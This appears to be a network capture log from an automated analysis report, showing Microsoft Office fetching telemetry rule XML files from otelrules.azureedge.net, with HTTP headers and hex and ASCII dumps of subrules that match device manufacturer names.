                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              25192.168.2.46374113.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 428
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                              x-ms-request-id: 9b24d4d0-601e-0032-3e08-2ceebb000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061559Z-16ccfc49897xnlwfhC1DFWz50s00000001t000000000493u
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              26192.168.2.46374313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:00 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                              x-ms-request-id: 396bdd21-c01e-0034-5008-2c2af6000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061600Z-176bd8f9bc5dfnrlhC1DFW9ueg00000001y0000000009b03
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              27192.168.2.46374213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:00 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 499
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                              x-ms-request-id: e5c4cfa3-b01e-0001-3cff-2b46e2000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061600Z-16dc884887b5dxtghC1DFW9q7c00000001t0000000005b2k
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              28192.168.2.46374413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:00 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                              x-ms-request-id: b1489392-e01e-0099-2a74-2cda8a000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061600Z-r159446fcd7r47cfhC1DFW56w800000000x0000000005xfx
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              29192.168.2.46374513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:00 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                              x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061600Z-16dc884887bj2dr2hC1DFWk11000000001r00000000077y0
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              30192.168.2.46374613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:00 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                              x-ms-request-id: 4f0d3f3a-301e-005d-390a-2ce448000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061600Z-176bd8f9bc55csg5hC1DFW6yfn00000001x00000000041yp
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:00 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              31192.168.2.46374713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 420
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                              x-ms-request-id: fd4533cb-201e-005d-3108-2cafb3000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061601Z-16ccfc49897rwhbvhC1DFWx88g00000001p0000000003us5
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              32192.168.2.46375013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                              x-ms-request-id: 38f7eb3e-301e-006e-6008-2cf018000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061601Z-16dc884887bssjjjhC1DFW2hb400000001gg00000000764m
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              33192.168.2.46374813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:01 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                              x-ms-request-id: de0f478a-601e-0032-7838-2ceebb000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061601Z-176bd8f9bc5nsp7rhC1DFWgzkc000000017g000000002vm4
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
